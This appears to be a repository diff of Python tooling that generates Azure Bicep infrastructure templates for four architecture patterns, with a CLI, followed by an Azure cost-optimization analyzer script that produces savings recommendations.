// Azure SQL (Serverless)
// ---------------------------------------------------------------------------

resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
  name: '${environment}-${appName}-sql'
  location: location
  properties: {
    administrators: {
      administratorType: 'ActiveDirectory'
      azureADOnlyAuthentication: true
      principalType: 'Group'
      sid: sqlAdminObjectId
      tenantId: subscription().tenantId
    }
    minimalTlsVersion: '1.2'
    publicNetworkAccess: environment == 'production' ? 'Disabled' : 'Enabled'
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
  parent: sqlServer
  name: '${appName}-db'
  location: location
  sku: {
    name: 'GP_S_Gen5_2'
    tier: 'GeneralPurpose'
  }
  properties: {
    autoPauseDelay: environment == 'production' ? -1 : 60
    minCapacity: json('0.5')
    zoneRedundant: environment == 'production'
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Application Insights + Log Analytics
// ---------------------------------------------------------------------------

resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
  name: '${environment}-${appName}-logs'
  location: location
  properties: {
    sku: { name: 'PerGB2018' }
    retentionInDays: environment == 'production' ? 90 : 30
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
  name: '${environment}-${appName}-ai'
  location: location
  kind: 'web'
  properties: {
    Application_Type: 'web'
    WorkspaceResourceId: logAnalytics.id
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------

output appServiceUrl string = 'https://${appService.properties.defaultHostName}'
output keyVaultUri string = keyVault.properties.vaultUri
output appInsightsKey string = appInsights.properties.InstrumentationKey
output sqlServerFqdn string = sqlServer.properties.fullyQualifiedDomainName
"""


def _microservices_template() -> str:
    return r"""// =============================================================================
// Azure Microservices Architecture — Bicep Template
// AKS + API Management + Cosmos DB + Service Bus + Key Vault
// =============================================================================

@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'

@description('Azure region')
param location string = resourceGroup().location

@description('Application name')
@minLength(3)
@maxLength(20)
param appName string

@description('AKS admin Entra ID group object ID')
param aksAdminGroupId string

// ---------------------------------------------------------------------------
// Key Vault
// ---------------------------------------------------------------------------

resource keyVault 'Microsoft.KeyVault/vaults@2023-07-01' = {
  name: '${environment}-${appName}-kv'
  location: location
  properties: {
    sku: { family: 'A', name: 'standard' }
    tenantId: subscription().tenantId
    enableRbacAuthorization: true
    enableSoftDelete: true
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// AKS Cluster
// ---------------------------------------------------------------------------

resource aksCluster 'Microsoft.ContainerService/managedClusters@2024-01-01' = {
  name: '${environment}-${appName}-aks'
  location: location
  identity: { type: 'SystemAssigned' }
  properties: {
    dnsPrefix: '${environment}-${appName}'
    kubernetesVersion: '1.29'
    enableRBAC: true
    aadProfile: {
      managed: true
      adminGroupObjectIDs: [aksAdminGroupId]
      enableAzureRBAC: true
    }
    networkProfile: {
      networkPlugin: 'azure'
      networkPolicy: 'azure'
      serviceCidr: '10.0.0.0/16'
      dnsServiceIP: '10.0.0.10'
    }
    agentPoolProfiles: [
      {
        name: 'system'
        count: environment == 'production' ? 3 : 1
        vmSize: 'Standard_D2s_v5'
        mode: 'System'
        enableAutoScaling: true
        minCount: 1
        maxCount: 3
        availabilityZones: environment == 'production' ? ['1', '2', '3'] : []
      }
      {
        name: 'app'
        count: environment == 'production' ? 3 : 1
        vmSize: 'Standard_D4s_v5'
        mode: 'User'
        enableAutoScaling: true
        minCount: 1
        maxCount: 10
        availabilityZones: environment == 'production' ? ['1', '2', '3'] : []
      }
    ]
    addonProfiles: {
      omsagent: {
        enabled: true
        config: {
          logAnalyticsWorkspaceResourceID: logAnalytics.id
        }
      }
    }
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Container Registry
// ---------------------------------------------------------------------------

resource acr 'Microsoft.ContainerRegistry/registries@2023-07-01' = {
  name: '${environment}${appName}acr'
  location: location
  sku: { name: environment == 'production' ? 'Standard' : 'Basic' }
  properties: {
    adminUserEnabled: false
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Cosmos DB (Serverless for dev, Autoscale for prod)
// ---------------------------------------------------------------------------

resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-11-15' = {
  name: '${environment}-${appName}-cosmos'
  location: location
  kind: 'GlobalDocumentDB'
  properties: {
    databaseAccountOfferType: 'Standard'
    consistencyPolicy: { defaultConsistencyLevel: 'Session' }
    locations: [
      { locationName: location, failoverPriority: 0, isZoneRedundant: environment == 'production' }
    ]
    capabilities: environment == 'dev' ? [{ name: 'EnableServerless' }] : []
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Service Bus
// ---------------------------------------------------------------------------

resource serviceBus 'Microsoft.ServiceBus/namespaces@2022-10-01-preview' = {
  name: '${environment}-${appName}-sb'
  location: location
  sku: { name: 'Standard', tier: 'Standard' }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Log Analytics + Application Insights
// ---------------------------------------------------------------------------

resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
  name: '${environment}-${appName}-logs'
  location: location
  properties: {
    sku: { name: 'PerGB2018' }
    retentionInDays: environment == 'production' ? 90 : 30
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
  name: '${environment}-${appName}-ai'
  location: location
  kind: 'web'
  properties: {
    Application_Type: 'web'
    WorkspaceResourceId: logAnalytics.id
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------

output aksClusterName string = aksCluster.name
output acrLoginServer string = acr.properties.loginServer
output cosmosEndpoint string = cosmosAccount.properties.documentEndpoint
output serviceBusEndpoint string = '${serviceBus.name}.servicebus.windows.net'
output keyVaultUri string = keyVault.properties.vaultUri
"""


def _serverless_template() -> str:
    return r"""// =============================================================================
// Azure Serverless Architecture — Bicep Template
// Azure Functions + Event Grid + Service Bus + Cosmos DB
// =============================================================================

@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'

@description('Azure region')
param location string = resourceGroup().location

@description('Application name')
@minLength(3)
@maxLength(20)
param appName string

// ---------------------------------------------------------------------------
// Storage Account (required by Functions)
// ---------------------------------------------------------------------------

resource storageAccount 'Microsoft.Storage/storageAccounts@2023-01-01' = {
  name: '${environment}${appName}st'
  location: location
  sku: { name: 'Standard_LRS' }
  kind: 'StorageV2'
  properties: {
    supportsHttpsTrafficOnly: true
    minimumTlsVersion: 'TLS1_2'
    allowBlobPublicAccess: false
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Azure Functions (Consumption Plan)
// ---------------------------------------------------------------------------

resource functionPlan 'Microsoft.Web/serverfarms@2023-01-01' = {
  name: '${environment}-${appName}-func-plan'
  location: location
  sku: {
    name: 'Y1'
    tier: 'Dynamic'
  }
  properties: {
    reserved: true // Linux
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource functionApp 'Microsoft.Web/sites@2023-01-01' = {
  name: '${environment}-${appName}-func'
  location: location
  kind: 'functionapp,linux'
  identity: { type: 'SystemAssigned' }
  properties: {
    serverFarmId: functionPlan.id
    httpsOnly: true
    siteConfig: {
      linuxFxVersion: 'NODE|20'
      minTlsVersion: '1.2'
      ftpsState: 'Disabled'
      appSettings: [
        { name: 'AzureWebJobsStorage', value: 'DefaultEndpointsProtocol=https;AccountName=${storageAccount.name};EndpointSuffix=core.windows.net;AccountKey=${storageAccount.listKeys().keys[0].value}' }
        { name: 'FUNCTIONS_EXTENSION_VERSION', value: '~4' }
        { name: 'FUNCTIONS_WORKER_RUNTIME', value: 'node' }
        { name: 'APPINSIGHTS_INSTRUMENTATIONKEY', value: appInsights.properties.InstrumentationKey }
        { name: 'COSMOS_ENDPOINT', value: cosmosAccount.properties.documentEndpoint }
        { name: 'SERVICE_BUS_CONNECTION', value: listKeys('${serviceBus.id}/AuthorizationRules/RootManageSharedAccessKey', serviceBus.apiVersion).primaryConnectionString }
      ]
    }
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Cosmos DB (Serverless)
// ---------------------------------------------------------------------------

resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-11-15' = {
  name: '${environment}-${appName}-cosmos'
  location: location
  kind: 'GlobalDocumentDB'
  properties: {
    databaseAccountOfferType: 'Standard'
    consistencyPolicy: { defaultConsistencyLevel: 'Session' }
    locations: [
      { locationName: location, failoverPriority: 0 }
    ]
    capabilities: [{ name: 'EnableServerless' }]
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Service Bus
// ---------------------------------------------------------------------------

resource serviceBus 'Microsoft.ServiceBus/namespaces@2022-10-01-preview' = {
  name: '${environment}-${appName}-sb'
  location: location
  sku: { name: 'Basic', tier: 'Basic' }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource orderQueue 'Microsoft.ServiceBus/namespaces/queues@2022-10-01-preview' = {
  parent: serviceBus
  name: 'orders'
  properties: {
    maxDeliveryCount: 5
    defaultMessageTimeToLive: 'P7D'
    deadLetteringOnMessageExpiration: true
    lockDuration: 'PT1M'
  }
}

// ---------------------------------------------------------------------------
// Application Insights + Log Analytics
// ---------------------------------------------------------------------------

resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
  name: '${environment}-${appName}-logs'
  location: location
  properties: {
    sku: { name: 'PerGB2018' }
    retentionInDays: 30
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
  name: '${environment}-${appName}-ai'
  location: location
  kind: 'web'
  properties: {
    Application_Type: 'web'
    WorkspaceResourceId: logAnalytics.id
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------

output functionAppUrl string = 'https://${functionApp.properties.defaultHostName}'
output cosmosEndpoint string = cosmosAccount.properties.documentEndpoint
output serviceBusEndpoint string = '${serviceBus.name}.servicebus.windows.net'
output appInsightsKey string = appInsights.properties.InstrumentationKey
"""


def _data_pipeline_template() -> str:
    return r"""// =============================================================================
// Azure Data Pipeline Architecture — Bicep Template
// Event Hubs + Data Lake Gen2 + Synapse Analytics + Azure Functions
// =============================================================================

@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'

@description('Azure region')
param location string = resourceGroup().location

@description('Application name')
@minLength(3)
@maxLength(20)
param appName string

// ---------------------------------------------------------------------------
// Data Lake Storage Gen2
// ---------------------------------------------------------------------------

resource dataLake 'Microsoft.Storage/storageAccounts@2023-01-01' = {
  name: '${environment}${appName}dl'
  location: location
  sku: { name: environment == 'production' ? 'Standard_ZRS' : 'Standard_LRS' }
  kind: 'StorageV2'
  properties: {
    isHnsEnabled: true // Hierarchical namespace for Data Lake Gen2
    supportsHttpsTrafficOnly: true
    minimumTlsVersion: 'TLS1_2'
    allowBlobPublicAccess: false
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource rawContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2023-01-01' = {
  name: '${dataLake.name}/default/raw'
  properties: { publicAccess: 'None' }
}

resource curatedContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2023-01-01' = {
  name: '${dataLake.name}/default/curated'
  properties: { publicAccess: 'None' }
}

// ---------------------------------------------------------------------------
// Event Hubs
// ---------------------------------------------------------------------------

resource eventHubNamespace 'Microsoft.EventHub/namespaces@2023-01-01-preview' = {
  name: '${environment}-${appName}-eh'
  location: location
  sku: {
    name: 'Standard'
    tier: 'Standard'
    capacity: environment == 'production' ? 2 : 1
  }
  properties: {
    minimumTlsVersion: '1.2'
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource eventHub 'Microsoft.EventHub/namespaces/eventhubs@2023-01-01-preview' = {
  parent: eventHubNamespace
  name: 'ingest'
  properties: {
    partitionCount: environment == 'production' ? 8 : 2
    messageRetentionInDays: 7
  }
}

resource consumerGroup 'Microsoft.EventHub/namespaces/eventhubs/consumergroups@2023-01-01-preview' = {
  parent: eventHub
  name: 'processing'
}

// ---------------------------------------------------------------------------
// Synapse Analytics (Serverless SQL)
// ---------------------------------------------------------------------------

resource synapse 'Microsoft.Synapse/workspaces@2021-06-01' = {
  name: '${environment}-${appName}-syn'
  location: location
  identity: { type: 'SystemAssigned' }
  properties: {
    defaultDataLakeStorage: {
      accountUrl: 'https://${dataLake.name}.dfs.core.windows.net'
      filesystem: 'curated'
    }
    sqlAdministratorLogin: 'sqladmin'
    sqlAdministratorLoginPassword: 'REPLACE_WITH_KEYVAULT_REFERENCE'
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Log Analytics
// ---------------------------------------------------------------------------

resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
  name: '${environment}-${appName}-logs'
  location: location
  properties: {
    sku: { name: 'PerGB2018' }
    retentionInDays: 30
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// Outputs
// ---------------------------------------------------------------------------

output dataLakeEndpoint string = 'https://${dataLake.name}.dfs.core.windows.net'
output eventHubNamespaceName string = eventHubNamespace.name // renamed so the output does not clash with the resource symbol
output synapseEndpoint string = synapse.properties.connectivityEndpoints.sql
"""


TEMPLATES: Dict[str, callable] = {
    "web-app": _web_app_template,
    "microservices": _microservices_template,
    "serverless": _serverless_template,
    "data-pipeline": _data_pipeline_template,
}

TEMPLATE_DESCRIPTIONS = {
    "web-app": "App Service + Azure SQL + Front Door + Key Vault + Application Insights",
    "microservices": "AKS + API Management + Cosmos DB + Service Bus + Key Vault",
    "serverless": "Azure Functions + Event Grid + Service Bus + Cosmos DB",
    "data-pipeline": "Event Hubs + Data Lake Gen2 + Synapse Analytics + Azure Functions",
}
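
Adding a new architecture pattern means registering one generator function in `TEMPLATES` plus a matching `TEMPLATE_DESCRIPTIONS` entry; the `--arch-type` choices are derived from the registry, so the CLI needs no change. The table-dispatch pattern in miniature (a standalone sketch with a hypothetical `demo` pattern):

```python
def _demo_template() -> str:
    # Stand-in for a real Bicep-generating function.
    return "// demo bicep\n"

REGISTRY = {"demo": _demo_template}  # mirrors the TEMPLATES dict above

arch_type = "demo"
content = REGISTRY[arch_type]()  # dispatch by key, call the generator
print(f"{arch_type}: {len(content.splitlines())} line(s)")
```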


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------


def main():
    parser = argparse.ArgumentParser(
        description="Azure Bicep Generator — generate Bicep IaC templates for common Azure architecture patterns.",
        epilog="Examples:\n"
        "  python bicep_generator.py --arch-type web-app\n"
        "  python bicep_generator.py --arch-type microservices --output main.bicep\n"
        "  python bicep_generator.py --arch-type serverless --json",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--arch-type",
        required=True,
        choices=list(TEMPLATES.keys()),
        help="Architecture pattern type",
    )
    parser.add_argument(
        "--output",
        type=str,
        default=None,
        help="Write Bicep to file instead of stdout",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        help="Output metadata as JSON (template content + description)",
    )

    args = parser.parse_args()

    template_fn = TEMPLATES[args.arch_type]
    bicep_content = template_fn()

    if args.json_output:
        result = {
            "arch_type": args.arch_type,
            "description": TEMPLATE_DESCRIPTIONS[args.arch_type],
            "bicep_template": bicep_content,
            "lines": len(bicep_content.strip().split("\n")),
        }
        print(json.dumps(result, indent=2))
    elif args.output:
        with open(args.output, "w") as f:
            f.write(bicep_content)
        print(f"Bicep template written to {args.output} ({len(bicep_content.strip().splitlines())} lines)")
        print(f"Pattern: {TEMPLATE_DESCRIPTIONS[args.arch_type]}")
        print("\nNext steps:")
        print(f"  1. az bicep build --file {args.output}")
        print(f"  2. az deployment group validate --resource-group <rg> --template-file {args.output}")
        print(f"  3. az deployment group create --resource-group <rg> --template-file {args.output}")
    else:
        print(bicep_content)


if __name__ == "__main__":
    main()

492 engineering-team/azure-cloud-architect/scripts/cost_optimizer.py Normal file
@@ -0,0 +1,492 @@
#!/usr/bin/env python3
"""
Azure cost optimization analyzer.
Analyzes Azure resource configurations and provides cost-saving recommendations.

Usage:
    python cost_optimizer.py --config resources.json
    python cost_optimizer.py --config resources.json --json
    python cost_optimizer.py --help

Expected JSON config format:
    {
      "virtual_machines": [
        {"name": "vm-web-01", "size": "Standard_D4s_v5", "cpu_utilization": 12, "pricing": "on-demand", "monthly_cost": 140}
      ],
      "sql_databases": [
        {"name": "sqldb-main", "tier": "GeneralPurpose", "vcores": 8, "utilization": 25, "monthly_cost": 400}
      ],
      "storage_accounts": [
        {"name": "stmyapp", "size_gb": 500, "tier": "Hot", "has_lifecycle_policy": false}
      ],
      "aks_clusters": [
        {"name": "aks-prod", "node_count": 6, "node_size": "Standard_D4s_v5", "avg_cpu_utilization": 35, "monthly_cost": 800}
      ],
      "cosmos_db": [
        {"name": "cosmos-orders", "ru_provisioned": 10000, "ru_used_avg": 2000, "monthly_cost": 580}
      ],
      "public_ips": [
        {"name": "pip-unused", "attached": false}
      ],
      "app_services": [
        {"name": "app-web", "tier": "PremiumV3", "instance_count": 3, "cpu_utilization": 15, "monthly_cost": 300}
      ],
      "has_budget_alerts": false,
      "has_advisor_enabled": false
    }
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
from typing import Dict, List, Any
|
||||
|
||||
|
||||
class AzureCostOptimizer:
|
||||
"""Analyze Azure resource configurations and recommend cost savings."""
|
||||
|
||||
def __init__(self, resources: Dict[str, Any]):
|
||||
self.resources = resources
|
||||
self.recommendations: List[Dict[str, Any]] = []
|
||||
|
||||
def analyze(self) -> Dict[str, Any]:
|
||||
"""Run all analysis passes and return full report."""
|
||||
self.recommendations = []
|
||||
total_savings = 0.0
|
||||
|
||||
total_savings += self._analyze_virtual_machines()
|
||||
total_savings += self._analyze_sql_databases()
|
||||
total_savings += self._analyze_storage()
|
||||
total_savings += self._analyze_aks()
|
||||
total_savings += self._analyze_cosmos_db()
|
||||
total_savings += self._analyze_app_services()
|
||||
total_savings += self._analyze_networking()
|
||||
total_savings += self._analyze_general()
|
||||
|
||||
current_spend = self._estimate_current_spend()
|
||||
|
||||
return {
|
||||
"current_monthly_usd": round(current_spend, 2),
|
||||
"potential_monthly_savings_usd": round(total_savings, 2),
|
||||
"optimized_monthly_usd": round(current_spend - total_savings, 2),
|
||||
"savings_percentage": round((total_savings / current_spend) * 100, 2) if current_spend > 0 else 0,
|
||||
"recommendations": self.recommendations,
|
||||
"priority_actions": self._top_priority(),
|
||||
}
|
||||
|
||||
    # ------------------------------------------------------------------
    # Analysis passes
    # ------------------------------------------------------------------

    def _analyze_virtual_machines(self) -> float:
        savings = 0.0
        vms = self.resources.get("virtual_machines", [])

        for vm in vms:
            cost = vm.get("monthly_cost", 140)
            cpu = vm.get("cpu_utilization", 100)
            pricing = vm.get("pricing", "on-demand")

            # Idle VMs
            if cpu < 5:
                savings += cost * 0.9
                self.recommendations.append({
                    "service": "Virtual Machines",
                    "type": "Idle Resource",
                    "issue": f"VM {vm.get('name', '?')} has <5% CPU utilization",
                    "recommendation": "Deallocate or delete the VM. Use Azure Automation auto-shutdown for dev/test VMs.",
                    "potential_savings_usd": round(cost * 0.9, 2),
                    "priority": "high",
                })
            elif cpu < 20:
                savings += cost * 0.4
                self.recommendations.append({
                    "service": "Virtual Machines",
                    "type": "Right-sizing",
                    "issue": f"VM {vm.get('name', '?')} is under-utilized ({cpu}% CPU)",
                    "recommendation": "Downsize to a smaller SKU. Use Azure Advisor right-sizing recommendations.",
                    "potential_savings_usd": round(cost * 0.4, 2),
                    "priority": "high",
                })

            # Reserved Instances
            if pricing == "on-demand" and cpu >= 20:
                ri_savings = cost * 0.35
                savings += ri_savings
                self.recommendations.append({
                    "service": "Virtual Machines",
                    "type": "Reserved Instances",
                    "issue": f"VM {vm.get('name', '?')} runs on-demand with steady utilization",
                    "recommendation": "Purchase 1-year Reserved Instance (up to 35% savings) or 3-year (up to 55% savings).",
                    "potential_savings_usd": round(ri_savings, 2),
                    "priority": "medium",
                })

        # Spot VMs for batch/fault-tolerant workloads
        spot_candidates = [vm for vm in vms if vm.get("workload_type") in ("batch", "dev", "test")]
        if spot_candidates:
            spot_savings = sum(vm.get("monthly_cost", 100) * 0.6 for vm in spot_candidates)
            savings += spot_savings
            self.recommendations.append({
                "service": "Virtual Machines",
                "type": "Spot VMs",
                "issue": f"{len(spot_candidates)} VMs running batch/dev/test workloads on regular instances",
                "recommendation": "Switch to Azure Spot VMs for up to 90% savings on interruptible workloads.",
                "potential_savings_usd": round(spot_savings, 2),
                "priority": "medium",
            })

        return savings

    def _analyze_sql_databases(self) -> float:
        savings = 0.0
        dbs = self.resources.get("sql_databases", [])

        for db in dbs:
            cost = db.get("monthly_cost", 200)
            utilization = db.get("utilization", 100)
            vcores = db.get("vcores", 2)
            tier = db.get("tier", "GeneralPurpose")

            # Idle databases
            if db.get("connections_per_day", 1000) < 10:
                savings += cost * 0.8
                self.recommendations.append({
                    "service": "Azure SQL",
                    "type": "Idle Resource",
                    "issue": f"Database {db.get('name', '?')} has <10 connections/day",
                    "recommendation": "Delete unused database or switch to serverless tier with auto-pause.",
                    "potential_savings_usd": round(cost * 0.8, 2),
                    "priority": "high",
                })

            # Serverless opportunity
            elif utilization < 30 and tier == "GeneralPurpose":
                serverless_savings = cost * 0.45
                savings += serverless_savings
                self.recommendations.append({
                    "service": "Azure SQL",
                    "type": "Serverless Migration",
                    "issue": f"Database {db.get('name', '?')} has low utilization ({utilization}%) on provisioned tier",
                    "recommendation": "Switch to Azure SQL Serverless tier with auto-pause (60-min delay). Pay only for active compute.",
                    "potential_savings_usd": round(serverless_savings, 2),
                    "priority": "high",
                })

            # Right-sizing
            elif utilization < 50 and vcores > 2:
                right_size_savings = cost * 0.3
                savings += right_size_savings
                self.recommendations.append({
                    "service": "Azure SQL",
                    "type": "Right-sizing",
                    "issue": f"Database {db.get('name', '?')} uses {vcores} vCores at {utilization}% utilization",
                    "recommendation": f"Reduce to {max(2, vcores // 2)} vCores. Monitor DTU/vCore usage after change.",
                    "potential_savings_usd": round(right_size_savings, 2),
                    "priority": "medium",
                })

        return savings
    def _analyze_storage(self) -> float:
        savings = 0.0
        accounts = self.resources.get("storage_accounts", [])

        for acct in accounts:
            size_gb = acct.get("size_gb", 0)
            tier = acct.get("tier", "Hot")

            # Lifecycle policy missing
            if not acct.get("has_lifecycle_policy", False) and size_gb > 50:
                lifecycle_savings = size_gb * 0.01  # ~$0.01/GB moving hot to cool
                savings += lifecycle_savings
                self.recommendations.append({
                    "service": "Blob Storage",
                    "type": "Lifecycle Policy",
                    "issue": f"Account {acct.get('name', '?')} ({size_gb} GB) has no lifecycle policy",
                    "recommendation": "Add lifecycle management: move to Cool after 30 days, Archive after 90 days.",
                    "potential_savings_usd": round(lifecycle_savings, 2),
                    "priority": "medium",
                })

            # Hot tier for large, infrequently accessed data
            if tier == "Hot" and size_gb > 500:
                tier_savings = size_gb * 0.008
                savings += tier_savings
                self.recommendations.append({
                    "service": "Blob Storage",
                    "type": "Storage Tier",
                    "issue": f"Account {acct.get('name', '?')} ({size_gb} GB) on Hot tier",
                    "recommendation": "Evaluate Cool or Cold tier for infrequently accessed data. Hot=$0.018/GB, Cool=$0.01/GB, Cold=$0.0036/GB.",
                    "potential_savings_usd": round(tier_savings, 2),
                    "priority": "high",
                })

        return savings

    def _analyze_aks(self) -> float:
        savings = 0.0
        clusters = self.resources.get("aks_clusters", [])

        for cluster in clusters:
            cost = cluster.get("monthly_cost", 500)
            cpu = cluster.get("avg_cpu_utilization", 100)
            node_count = cluster.get("node_count", 3)

            # Over-provisioned cluster
            if cpu < 30 and node_count > 3:
                aks_savings = cost * 0.3
                savings += aks_savings
                self.recommendations.append({
                    "service": "AKS",
                    "type": "Right-sizing",
                    "issue": f"Cluster {cluster.get('name', '?')} has {node_count} nodes at {cpu}% CPU",
                    "recommendation": "Enable cluster autoscaler. Set min nodes to 2 (or 1 for dev). Use node auto-provisioning.",
                    "potential_savings_usd": round(aks_savings, 2),
                    "priority": "high",
                })

            # Spot node pools for non-critical workloads
            if not cluster.get("has_spot_pool", False):
                spot_savings = cost * 0.15
                savings += spot_savings
                self.recommendations.append({
                    "service": "AKS",
                    "type": "Spot Node Pools",
                    "issue": f"Cluster {cluster.get('name', '?')} has no spot node pools",
                    "recommendation": "Add a spot node pool for batch jobs, CI runners, and dev workloads (up to 90% savings).",
                    "potential_savings_usd": round(spot_savings, 2),
                    "priority": "medium",
                })

        return savings

    def _analyze_cosmos_db(self) -> float:
        savings = 0.0
        dbs = self.resources.get("cosmos_db", [])

        for db in dbs:
            cost = db.get("monthly_cost", 200)
            ru_provisioned = db.get("ru_provisioned", 400)
            ru_used = db.get("ru_used_avg", 400)

            # Massive over-provisioning
            if ru_provisioned > 0 and ru_used / ru_provisioned < 0.2:
                cosmos_savings = cost * 0.5
                savings += cosmos_savings
                self.recommendations.append({
                    "service": "Cosmos DB",
                    "type": "Right-sizing",
                    "issue": f"Container {db.get('name', '?')} uses {ru_used}/{ru_provisioned} RU/s ({int(ru_used/ru_provisioned*100)}% utilization)",
                    "recommendation": "Switch to autoscale throughput or serverless mode. Autoscale adjusts RU/s between 10%-100% of max.",
                    "potential_savings_usd": round(cosmos_savings, 2),
                    "priority": "high",
                })
            elif ru_provisioned > 0 and ru_used / ru_provisioned < 0.5:
                cosmos_savings = cost * 0.25
                savings += cosmos_savings
                self.recommendations.append({
                    "service": "Cosmos DB",
                    "type": "Autoscale",
                    "issue": f"Container {db.get('name', '?')} uses {ru_used}/{ru_provisioned} RU/s — variable workload",
                    "recommendation": "Enable autoscale throughput. Set max RU/s to current provisioned value.",
                    "potential_savings_usd": round(cosmos_savings, 2),
                    "priority": "medium",
                })

        return savings
    def _analyze_app_services(self) -> float:
        savings = 0.0
        apps = self.resources.get("app_services", [])

        for app in apps:
            cost = app.get("monthly_cost", 100)
            cpu = app.get("cpu_utilization", 100)
            instances = app.get("instance_count", 1)
            tier = app.get("tier", "Basic")

            # Over-provisioned instances
            if cpu < 20 and instances > 1:
                app_savings = cost * 0.4
                savings += app_savings
                self.recommendations.append({
                    "service": "App Service",
                    "type": "Right-sizing",
                    "issue": f"App {app.get('name', '?')} runs {instances} instances at {cpu}% CPU",
                    "recommendation": "Reduce instance count or enable autoscale with min=1. Consider downgrading plan tier.",
                    "potential_savings_usd": round(app_savings, 2),
                    "priority": "high",
                })

            # Premium tier for dev/test
            if tier in ("PremiumV3", "PremiumV2") and app.get("environment") in ("dev", "test"):
                tier_savings = cost * 0.5
                savings += tier_savings
                self.recommendations.append({
                    "service": "App Service",
                    "type": "Plan Tier",
                    "issue": f"App {app.get('name', '?')} uses {tier} in {app.get('environment', 'unknown')} environment",
                    "recommendation": "Use Basic (B1) or Free tier for dev/test environments.",
                    "potential_savings_usd": round(tier_savings, 2),
                    "priority": "high",
                })

        return savings

    def _analyze_networking(self) -> float:
        savings = 0.0

        # Unattached public IPs
        pips = self.resources.get("public_ips", [])
        unattached = [p for p in pips if not p.get("attached", True)]
        if unattached:
            pip_savings = len(unattached) * 3.65  # ~$0.005/hr = $3.65/month
            savings += pip_savings
            self.recommendations.append({
                "service": "Public IP",
                "type": "Unused Resource",
                "issue": f"{len(unattached)} unattached public IPs incurring hourly charges",
                "recommendation": "Delete unused public IPs. Unattached Standard SKU IPs cost ~$3.65/month each.",
                "potential_savings_usd": round(pip_savings, 2),
                "priority": "high",
            })

        # NAT Gateway in dev environments
        nat_gateways = self.resources.get("nat_gateways", [])
        dev_nats = [n for n in nat_gateways if n.get("environment") in ("dev", "test")]
        if dev_nats:
            nat_savings = len(dev_nats) * 32  # ~$32/month per NAT Gateway
            savings += nat_savings
            self.recommendations.append({
                "service": "NAT Gateway",
                "type": "Environment Optimization",
                "issue": f"{len(dev_nats)} NAT Gateways in dev/test environments",
                "recommendation": "Remove NAT Gateways in dev/test. Use Azure Firewall or service tags for outbound instead.",
                "potential_savings_usd": round(nat_savings, 2),
                "priority": "medium",
            })

        return savings

    def _analyze_general(self) -> float:
        savings = 0.0

        if not self.resources.get("has_budget_alerts", False):
            self.recommendations.append({
                "service": "Cost Management",
                "type": "Budget Alerts",
                "issue": "No budget alerts configured",
                "recommendation": "Create Azure Budget with alerts at 50%, 80%, and 100% of monthly target.",
                "potential_savings_usd": 0,
                "priority": "high",
            })

        if not self.resources.get("has_advisor_enabled", True):
            self.recommendations.append({
                "service": "Azure Advisor",
                "type": "Visibility",
                "issue": "Azure Advisor cost recommendations not reviewed",
                "recommendation": "Review Azure Advisor cost recommendations weekly. Enable Advisor alerts for new findings.",
                "potential_savings_usd": 0,
                "priority": "medium",
            })

        return savings
    # ------------------------------------------------------------------
    # Helpers
    # ------------------------------------------------------------------

    def _estimate_current_spend(self) -> float:
        total = 0.0
        for key in ("virtual_machines", "sql_databases", "aks_clusters", "cosmos_db", "app_services"):
            for item in self.resources.get(key, []):
                total += item.get("monthly_cost", 0)
        # Storage estimate
        for acct in self.resources.get("storage_accounts", []):
            total += acct.get("size_gb", 0) * 0.018  # Hot tier default
        # Public IPs
        for pip in self.resources.get("public_ips", []):
            total += 3.65
        return total if total > 0 else 1000  # Default if no cost data

